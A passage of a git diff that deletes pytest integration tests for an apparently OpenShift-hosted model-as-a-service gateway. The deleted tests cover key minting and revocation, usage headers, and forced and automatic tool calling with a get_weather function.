-    key = mint_maas_key(http, base_url, FREE_OC_TOKEN, minutes=10)
-    assert isinstance(key, str) and len(key) > 10
-    # prove the key works and don’t hang forever
-    r_ok = http.get(f"{base_url}/v1/models", headers=bh(key), timeout=30)
-    assert r_ok.status_code == 200
-
-def test_tokens_invalid_ttl_400(http, base_url):
-    from conftest import FREE_OC_TOKEN, http_post
-    url = f"{base_url}/v1/tokens"
-    code, body, r = http_post(
-        http,
-        url,
-        headers=bearer(FREE_OC_TOKEN),
-        json={"expiration": "4hours"},
-        timeout=30,          # add timeout so it can’t hang
-    )
-    assert code == 400
-
-def test_tokens_models_happy_then_revoked_fails(http, base_url, model_name):
-    from conftest import FREE_OC_TOKEN, mint_maas_key, revoke_maas_key, bearer
-
-    # 1) Mint a MaaS key from the current OC user token
-    key = mint_maas_key(http, base_url, FREE_OC_TOKEN, minutes=10)
-
-    # 2) Discover the model URL
-    models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30).json()
-    items = models.get("data") or models.get("models") or []
-    target = next((m for m in items if m.get("id")==model_name or m.get("name")==model_name), None)
-    assert target and target.get("url"), "model not found or missing url"
-    murl = target["url"]
-
-    payload = {"model": model_name,
-               "messages":[{"role":"user","content":"hi"}],
-               "max_tokens": 32}
-
-    # 3) Works before revoke
-    r_ok = http.post(f"{murl}/v1/chat/completions", headers=bearer(key), json=payload, timeout=60)
-    assert r_ok.status_code in (200, 201)
-
-    # 4) Revoke the key
-    r_del = revoke_maas_key(http, base_url, FREE_OC_TOKEN, key)
-    assert r_del.status_code in (200, 202, 204)
-
-    # 5) Fails after revoke
-    r_bad = http.post(f"{murl}/v1/chat/completions", headers=bearer(key), json=payload, timeout=60)
-    assert r_bad.status_code in (401, 403)
-
-def test_usage_headers_present(http, base_url, model_name):
-    from conftest import bearer, ensure_free_key, parse_usage_headers
-
-    key = ensure_free_key(http)
-
-    # discover model URL
-    models = http.get(f"{base_url}/v1/models", headers=bearer(key), timeout=30).json()
-    items = models.get("data") or models.get("models") or []
-    target = next((m for m in items if m.get("id")==model_name or m.get("name")==model_name), None)
-    assert target and target.get("url"), "model not found or missing url"
-    murl = target["url"]
-
-    r = http.post(
-        f"{murl}/v1/chat/completions",
-        headers=bearer(key),
-        json={"model": model_name, "messages":[{"role":"user","content":"Say hi"}], "temperature":0},
-        timeout=60,
-    )
-    assert r.status_code in (200, 201), f"unexpected {r.status_code}: {r.text[:200]}"
-
-    usage = parse_usage_headers(r)
-    # assert presence and non-negative total
-    assert "x-odhu-usage-total-tokens" in usage, f"No usage headers present: {dict(r.headers)}"
-    assert int(usage["x-odhu-usage-total-tokens"]) >= 0
diff --git a/test/maas_billing_tests_independent/tests/test_tool_calling.py b/test/maas_billing_tests_independent/tests/test_tool_calling.py
deleted file mode 100644
index 655747dcf..000000000
--- a/test/maas_billing_tests_independent/tests/test_tool_calling.py
+++ /dev/null
@@ -1,168 +0,0 @@
-import os
-import json
-import subprocess, shlex
-import pytest
-
-def _parse_args(args_raw):
-    if isinstance(args_raw, dict):
-        return args_raw
-    return json.loads(args_raw)
-
-@pytest.mark.skipif(
-    os.getenv("TOOL_CALLING_ENABLED", "false").lower() not in ("1", "true", "yes"),
-    reason="Tool calling not enabled for this environment",
-)
-def test_tool_calling_forced(http, base_url, model_name, tools_spec):
-
-    # 1️⃣ Mint MaaS token using oc whoami -t
-    oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip()
-    mint_url = f"{base_url}/v1/tokens"
-    r = http.post(
-        mint_url,
-        headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"},
-        json={"expiration": "20m"},
-        timeout=30,
-    )
-    assert r.status_code in (200, 201), f"Token mint failed: {r.status_code} {r.text}"
-    token = r.json()["token"]
-
-    # 2️⃣ List models
-    models_url = f"{base_url}/v1/models"
-    r = http.get(models_url, headers={"Authorization": f"Bearer {token}"}, timeout=30)
-    assert r.status_code == 200, f"Models list failed: {r.status_code} {r.text}"
-    models = r.json()["data"]
-
-    model_entry = next((m for m in models if m["id"] == model_name), None)
-    assert model_entry, f"Model {model_name} not found in /v1/models"
-    model_url = model_entry["url"]
-    chat_url = f"{model_url}/v1/chat/completions"
-    print(f"[debug] posting to: {chat_url}")
-
-    # 3️⃣ Tool-calling test (forced)
-    payload = {
-        "model": model_name,
-        "messages": [
-            {"role": "system", "content": "When tool_choice is set, ALWAYS return exactly one tool call with fully-formed JSON arguments."},
-            {"role": "user", "content": "What's the weather in Boston, MA? Call the get_weather tool and pass location='Boston' and unit='fahrenheit'."}
-        ],
-        "tools": tools_spec,
-        "tool_choice": {"type": "function", "function": {"name": "get_weather"}},
-        "temperature": 0,
-        "max_tokens": 128,
-    }
-
-    r = http.post(
-        chat_url,
-        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
-        json=payload,
-        timeout=60,
-    )
-    assert r.status_code in (200, 201), f"Chat call failed: {r.status_code} {r.text}"
-
-    data = r.json()
-    msg = data["choices"][0]["message"]
-    tool_calls = msg.get("tool_calls") or []
-    print("[tool_calling] endpoint:", chat_url)
-    print("[tool_calling] http:", r.status_code)
-    print("[tool_calling] tool_calls:", json.dumps(tool_calls, indent=2))
-    print("[tool_calling] full_response:", json.dumps(data, indent=2))
-    assert tool_calls, "No tool_calls in response"
-    assert len(tool_calls) == 1, f"Expected exactly one tool_call, got {len(tool_calls)}"
-
-    call0 = tool_calls[0]
-    fn = (call0.get("function") or {}).get("name")
-    args_raw = (call0.get("function") or {}).get("arguments")
-    args = _parse_args(args_raw)
-
-    assert fn == "get_weather", f"Unexpected tool: {fn}"
-    assert ("city" in args or "location" in args), f"Missing city/location in args: {args}"
-
-@pytest.mark.skipif(
-    os.getenv("TOOL_CALLING_ENABLED", "false").lower() not in ("1","true","yes"),
-    reason="Tool calling not enabled for this environment",
-)
-def test_tool_calling_auto(http, base_url, model_name, tools_spec):
-    # 1) Mint MaaS token (same as forced)
-    oc_token = subprocess.check_output(shlex.split("oc whoami -t"), text=True).strip()
-    mint_url = f"{base_url}/v1/tokens"
-    r = http.post(
-        mint_url,
-        headers={"Authorization": f"Bearer {oc_token}", "Content-Type": "application/json"},
-        json={"expiration": "20m"},
-        timeout=30,
-    )
-    assert r.status_code in (200, 201), f"Token mint failed: {r.status_code} {r.text}"
-    token = r.json()["token"]
-
-    # 2) Discover model URL (same as forced)
-    models_url = f"{base_url}/v1/models"
-    r = http.get(models_url, headers={"Authorization": f"Bearer {token}"}, timeout=30)
-    assert r.status_code == 200, f"Models list failed: {r.status_code} {r.text}"
-    models = r.json()["data"]
-    model_entry = next((m for m in models if m["id"] == model_name), None)
-    assert model_entry, f"Model {model_name} not found in /v1/models"
-    model_url = model_entry["url"]
-    chat_url = f"{model_url}/v1/chat/completions"
-    print(f"[debug] posting to: {chat_url}")
-
-    # 3) Auto tool-calling payload
-    payload = {
-        "model": model_name,
-        "messages": [
-            {
-                "role": "system",
-                "content": (
-                    "You are a tool-using assistant. When the user asks about weather, "
-                    "you MUST call the get_weather tool exactly once with JSON arguments. "
-                    "Do not answer in plain text before the tool call."
-                ),
-            },
-            {"role": "user", "content": "What's the weather in Boston, MA today? Use Fahrenheit."},
-        ],
-        "tools": [
-            {
-                "type": "function",
-                "function": {
-                    "name": "get_weather",
-                    "description": "Get current weather.",
-                    "parameters": {
-                        "type": "object",
-                        "properties": {
-                            "location": {"type": "string", "description": "City, e.g. 'Boston, MA'"},
-                            "unit": {"type": "string", "enum": ["celsius", "fahrenheit"]},
-                        },
-                        "required": ["location"],
-                        "additionalProperties": False,
-                    },
-                },
-            }
-        ],
-        "tool_choice": "auto",
-        "temperature": 0,
-        "max_tokens": 384,             # give Qwen room beyond its <think> prelude
-        "parallel_tool_calls": False,  # keep it to one call
-    }
-
-    r = http.post(
-        chat_url,
-        headers={"Authorization": f"Bearer {token}", "Content-Type": "application/json"},
-        json=payload,
-        timeout=60,
-    )
-    assert r.status_code in (200, 201), f"Chat call failed: {r.status_code} {r.text}"
-    data = r.json()
-    msg = data["choices"][0]["message"]
-    tool_calls = msg.get("tool_calls") or []
-    print("[tool_calling_auto] http:", r.status_code)
-    print("[tool_calling_auto] tool_calls:", json.dumps(tool_calls, indent=2))
-    print("[tool_calling_auto] full_response:", json.dumps(data, indent=2))
-
-    # Soft assertion: if the model still chooses not to call, skip (backend is configured for auto)
-    if not tool_calls:
-        pytest.skip("Model chose not to emit tool_calls in auto mode")
-
-    fn = (tool_calls[0].get("function") or {}).get("name")
-    args_raw = (tool_calls[0].get("function") or {}).get("arguments")
-    args = args_raw if isinstance(args_raw, dict) else json.loads(args_raw)
-    assert fn == "get_weather"
-    assert args.get("location"), f"Missing location in args: {args}"
\ No newline at end of file